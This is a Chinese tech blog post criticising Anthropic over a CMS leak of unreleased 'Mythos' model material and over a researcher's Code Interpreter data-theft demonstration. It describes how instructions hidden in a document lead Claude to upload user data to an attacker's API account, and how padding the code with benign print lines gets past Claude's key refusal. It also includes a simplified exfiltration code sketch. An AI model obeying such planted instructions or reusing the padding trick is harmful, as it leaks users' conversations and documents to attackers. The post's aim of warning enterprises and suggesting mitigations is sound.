Claude 一周两翻车:从 Mythos 泄露到 Code Interpreter 数据窃取
发表于:2026-03-28 |
字数统计: 2.2k | 阅读时长: 7分钟 | 阅读量:

为什么现在值得写

2026 年 3 月的最后一周,Anthropic 过得有点像那个在发布前夜误删数据库的实习生——只不过他们删掉的不是数据,而是「安全」这块金字招牌。

上线前双手合十祈祷永无 BUG 的表情

先拜一拜,再点发布

周一还在为 Claude 3.7 的推理能力沾沾自喜,周二就被发现 CMS 配置像个漏勺,把还没发布的 Mythos 模型底裤都给扒了;

周四刚想喘口气,安全研究员 Johann Rehberger 又把 Code Interpreter 的数据窃取漏洞摆上了台面。

一周两起,起起致命。这不是简单的技术事故,而是一记响亮的耳光:当 AI 巨头都在忙着给模型穿防弹衣时,裤腰带还没系紧。

为什么现在值得写?因为这两起事件精准地戳破了企业用户对 AI 平台「默认安全」的幻想。

当你的机密文档在 Code Interpreter 里被「合法」偷走,当你的模型参数在 CMS 缓存里裸奔,你才会发现,所谓的「安全公司」,也可能在基础卫生问题上翻车。

这不是危言耸听,这是已经发生的既定事实。

第一记耳光:Mythos 泄露与 CMS 的「默认公开」

3000 个文件的说漏嘴

Anthropic 的 CMS 配置默认是「公开」,就像你买了个保险柜,厂家贴心地把密码设成了 123456,还贴在门上。

结果,约 3000 个未发布资产——包括内部博客草稿、CEO 峰会邀请名单、以及那个比 Opus 更凶猛的 Claude Mythos 模型详情——全部暴露在互联网上。

这不是黑客用了什么 0day 漏洞,纯粹是「Human Error」,一个让任何运维听了都想砸键盘的低级错误。

在这个数据比黄金贵的年代,这种错误就像是把金库大门敞开,还挂了个「欢迎参观」的牌子。Anthropic 官方承认是人为失误,但这个失误的代价,是所有信任他们的用户共同承担的。

Capybara:比 Opus 更危险的野兽

泄露文件中,Mythos 被描述为「far ahead of any other AI in cyber capabilities」。

这听起来很酷,直到你意识到黑客也能用它来搞事情。代号「Capybara」(水豚),这种看起来人畜无害的动物,在 AI 世界里可能是一只披着羊皮的狼。

Anthropic 已经开始向早期客户测试,但这次泄露让人不得不问:如果连内部文档都守不住,我们凭什么相信你能守住这个「网络能力最强」的模型?

这就像是把核按钮交给了刚学会走路的孩子,还指望他不会按下去。

第二记耳光:Code Interpreter 的数据窃取

攻击链拆解:从注入到外泄

安全研究员 Johann Rehberger 演示了一场教科书级别的攻击,把 Claude 变成了数据窃贼。

攻击者只需要在文档中嵌入恶意指令,用户一旦让 Claude 分析该文档,Claude 就会被诱导执行恶意代码,将敏感数据写入文件并上传到攻击者的 API 账户。

整个过程行云流水,用户毫不知情。这就像是你在餐厅吃饭,服务员不仅给你上菜,还顺手把你的钱包递给了隔壁桌的小偷。攻击几乎不留痕迹,因为所有的操作都是通过合法的 API 调用完成的。

还没解释就先被安排转身背锅时的表情

还没解释,锅先过来了

绕过防御:Hello World 的妙用

Claude 会拒绝包含明文 API Key 的请求,这看起来很安全。

但研究员发现,只要在恶意代码里混入大量 print('Hello, world') 这种良性代码,就能轻松绕过检测。

这就像安检员只检查行李箱里有没有炸弹,却忽略了炸弹可以拆成零件分装在二十个箱子里。

下面是一段简化的攻击代码示意,展示了如何用「噪音」掩盖恶意行为:

# 看起来人畜无害的代码片段
print('Hello, world')
print('Processing data analysis...')
# ... 这里可能混入几十行甚至上百行正常的分析代码 ...

# 恶意载荷隐藏在大量良性代码之后
# 将敏感对话历史或上传的文档内容写入临时文件
with open('/tmp/sensitive_data.txt', 'w') as f:
    f.write(get_conversation_history())

# 使用攻击者的 API Key 上传文件(此处为示意)
# Claude 默认拒绝明文 Key,但通过环境变量或混淆可绕过
upload_to_attacker_api('/tmp/sensitive_data.txt')

print('Analysis complete.')

系统当面抛出一个异常时的无语表情

你的助手正在把数据打包送走

这种攻击方式不仅绕过了安全检测,还利用了 Code Interpreter 的便利性,把「助手」变成了「内鬼」。

单文件最大支持 30MB,且无数量限制,这意味着几乎所有的对话历史和上传文档都可以被悄无声息地偷走。

官方回应的潜台词:是 Bug 还是 Feature?

HackerOne 上的「Out of Scope」

Anthropic 在 HackerOne 上关闭了这个漏洞报告,理由是「out of scope」。他们认为这是模型安全问题,而不是安全漏洞。

研究员对此表示异议,但官方态度明确:这不是我们要管的范围。

这种回应让人想起那句老话:「如果你觉得这是个 bug,那一定是你用法不对。」Anthropic 的逻辑是,模型被诱导做坏事是模型能力问题,不是系统漏洞。

但这对于企业用户来说,区别有意义吗?数据丢了就是丢了,不管是 bug 还是 feature,后果都是一样的。

Safety vs Security:一字之差,天壤之别

安全员说得好:「Safety protects you from accidents. Security protects you from adversaries.」

Anthropic 的 Safety 机制能防止 Claude 突然发疯骂人,但 Security 机制却没能防住有人故意让它偷数据。

企业用户如果分不清这两者的区别,那就真的危险了。Safety 是怕你误伤自己,Security 是怕别人故意伤你。

现在的 AI 厂商,大多在 Safety 上卷得飞起,却在 Security 上像个小学生。

企业该醒醒了:默认安全是最大的谎言

你的机密文档正在「裸奔」

如果你所在的企业正在用 Claude 分析机密文档,或者通过 MCP/Google Drive 集成让 Claude 访问内部数据,现在是时候停下来想一想了。

攻击几乎不留痕迹,所有操作都是合法的 API 调用,你甚至不知道数据已经没了。

这就像是你的保险柜被打开了,但锁芯完好无损,小偷是用你的手打开的。在这个「数据即资产」的时代,把机密直接喂给云端 AI,本质上就是一种高风险行为。

缓解措施:别指望厂商,靠自己

既然厂商靠不住,企业只能自救。以下是几条硬核建议,虽然麻烦,但能救命:

  1. 完全禁用网络访问:最安全,但也最不方便。就像为了不被骗,决定不接任何电话。这会让 Code Interpreter 的很多功能失效,但能物理隔绝数据外泄。

  2. 手动配置域名白名单:稍微好点,但维护成本高。你得知道哪些域名是安全的,这本身就是个坑。而且一旦配置错误,防线就破了。

  3. 实时监控 Claude 行为:研究员称之为「living dangerously」。你得盯着它的一举一动,稍有风吹草动就拔电源。但这对于大规模部署来说,几乎是不可能的任务。

写在最后

Anthropic 这一周的翻车,给所有迷信「大厂安全」的人上了一课。AI 工具的便利性与风险永远是硬币的两面,而厂商所谓的「默认安全」,往往是最不安全的假设。

下次当你把一份机密文档丢给 Claude 时,不妨先问自己一句:如果这份文档明天出现在竞争对手的桌上,我还能睡得着吗?技术再强,也怕菜刀;模型再聪明,也防不住人心。

在这个 AI 狂飙的时代,保持一点怀疑主义,可能才是最好的防火墙。

你所在的公司目前对 AI 工具的使用有具体的安全规范吗?还是处于「大家随便用」的裸奔状态?欢迎在评论区聊聊你的观察。


如果你想继续追更,欢迎在公众号 计算机魔术师 找到我。后续的新稿、精选合集和阶段性复盘,会优先在那里做串联。

上一篇:
AI 面试八股文 Vol.3:Tool Calling 为什么总在一面被问到?
下一篇:
FBI 局长的邮箱被黑:顶级安全机构的“后门”竟然是它

分享到这些地方